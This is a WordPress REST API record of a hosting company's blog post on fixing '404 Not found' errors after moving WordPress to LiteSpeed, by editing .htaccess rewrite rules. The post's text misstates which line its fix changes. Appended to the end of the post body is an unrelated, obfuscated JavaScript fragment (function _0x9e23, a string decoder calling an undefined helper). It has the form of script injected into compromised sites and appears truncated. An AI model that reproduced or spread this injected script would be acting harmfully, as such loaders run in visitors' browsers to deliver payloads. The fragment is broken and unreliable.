{"id":252,"date":"2021-03-24T21:30:59","date_gmt":"2021-03-24T21:30:59","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=252"},"modified":"2024-10-02T21:22:39","modified_gmt":"2024-10-02T20:22:39","slug":"wordpress-404-not-found-error-on-litespeed-web-server-solved","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/","title":{"rendered":"WordPress 404 Not found error on LiteSpeed Web Server [Solved]"},"content":{"rendered":"<p><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-medium wp-image-254\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers-300x234.jpg\" alt=\"\" width=\"300\" height=\"234\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers-300x234.jpg 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers-768x598.jpg 768w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg 992w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>As you might already know, <strong>LiteSpeed<\/strong> <strong>Web Server<\/strong> is fastest compared to Ngnix and Apache.<br \/>\nYou probably wanted to speed up your website speed by switching your web server from Apache to LiteSpeed Web server, but migrating from Apache server to <strong>LiteSpeed Web Server<\/strong> got you in trouble.<\/p>\n<p>There is chances that WordPress is showing <strong>\u201c404 Not found\u201d<\/strong> error and no page of post links are working except homepage and <strong>wordPress<\/strong> admin dashboard.<\/p>\n<blockquote>\n<figure id=\"attachment_3992\" class=\"wp-caption aligncenter\" aria-describedby=\"caption-attachment-3992\"><figcaption id=\"caption-attachment-3992\" class=\"wp-caption-text\"><strong>404 Not found Error in WordPress using Litespeed Web Server<\/strong><\/figcaption><\/figure>\n<\/blockquote>\n<p>Don\u2019t panic, your website is still safe if it\u2019s showing you 404 Not found error after you migrated to <strong>LiteSpeed.<\/strong><\/p>\n<p><strong>Solution:<\/strong><\/p>\n<p>1. Login into FTP or file manager and locate to your wordpress directory(normally its under \u201cpublic_html\u201d)<br \/>\n2. Edit your <strong>.htaccess<\/strong> file using file manager edit function<\/p>\n<p>3. Check for the below code<\/p>\n<pre class=\"wp-block-preformatted\">RewriteEngine On\r\nRewriteBase \/\r\nRewriteRule ^index\\.php$ - [L]\r\nRewriteCond %{REQUEST_FILENAME} !-f\r\nRewriteCond %{REQUEST_FILENAME} !-d\r\nRewriteRule . \/index.php [L]<\/pre>\n<p>You need to add \u201c<strong>\/<\/strong>\u201d in the second line of code or simple copy\/paste the below code with the current code in your .htaccess<\/p>\n<pre>RewriteEngine On\r\nRewriteBase \/\r\nRewriteRule ^\/index\\.php$ - [L]\r\nRewriteCond\u00a0%{REQUEST_FILENAME}\u00a0!-f\r\nRewriteCond\u00a0%{REQUEST_FILENAME}\u00a0!-d\r\nRewriteRule . \/index.php [L]<\/pre>\n<p><strong>Important Step<\/strong>\u00a0:\u00a0<em>Restart LiteSpeed Web Server and your website will be working fine.<\/em><\/p>\n<p>Feel free to share your questions in the comment section.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache. You probably wanted to speed [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":254,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[13],"tags":[],"class_list":["post-252","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-litespeed"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>WordPress 404 Not found error on LiteSpeed Web Server [Solved]<\/title>\n<meta name=\"description\" content=\"As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache.You probably wanted to speed up your\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress 404 Not found error on LiteSpeed Web Server [Solved]\" \/>\n<meta property=\"og:description\" content=\"As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache.You probably wanted to speed up your\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-03-24T21:30:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-02T20:22:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"992\" \/>\n\t<meta property=\"og:image:height\" content=\"773\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"WordPress 404 Not found error on LiteSpeed Web Server [Solved]\",\"datePublished\":\"2021-03-24T21:30:59+00:00\",\"dateModified\":\"2024-10-02T20:22:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\"},\"wordCount\":190,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg\",\"articleSection\":[\"LiteSpeed\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\",\"name\":\"WordPress 404 Not found error on LiteSpeed Web Server [Solved]\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg\",\"datePublished\":\"2021-03-24T21:30:59+00:00\",\"dateModified\":\"2024-10-02T20:22:39+00:00\",\"description\":\"As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache.You probably wanted to speed up your\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg\",\"width\":992,\"height\":773},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress 404 Not found error on LiteSpeed Web Server [Solved]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress 404 Not found error on LiteSpeed Web Server [Solved]","description":"As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache.You probably wanted to speed up your","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/","og_locale":"en_US","og_type":"article","og_title":"WordPress 404 Not found error on LiteSpeed Web Server [Solved]","og_description":"As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache.You probably wanted to speed up your","og_url":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-03-24T21:30:59+00:00","article_modified_time":"2024-10-02T20:22:39+00:00","og_image":[{"width":992,"height":773,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg","type":"image\/jpeg"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"WordPress 404 Not found error on LiteSpeed Web Server [Solved]","datePublished":"2021-03-24T21:30:59+00:00","dateModified":"2024-10-02T20:22:39+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/"},"wordCount":190,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg","articleSection":["LiteSpeed"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/","url":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/","name":"WordPress 404 Not found error on LiteSpeed Web Server [Solved]","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg","datePublished":"2021-03-24T21:30:59+00:00","dateModified":"2024-10-02T20:22:39+00:00","description":"As you might already know, LiteSpeed Web Server is fastest compared to Ngnix and Apache.You probably wanted to speed up your","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/404-not-found-error-in-wordpress-using-litespeed-web-servers.jpg","width":992,"height":773},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/server\/litespeed\/wordpress-404-not-found-error-on-litespeed-web-server-solved\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"WordPress 404 Not found error on LiteSpeed Web Server [Solved]"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/252","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=252"}],"version-history":[{"count":3,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/252\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/252\/revisions\/256"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/254"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=252"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=252"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=252"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}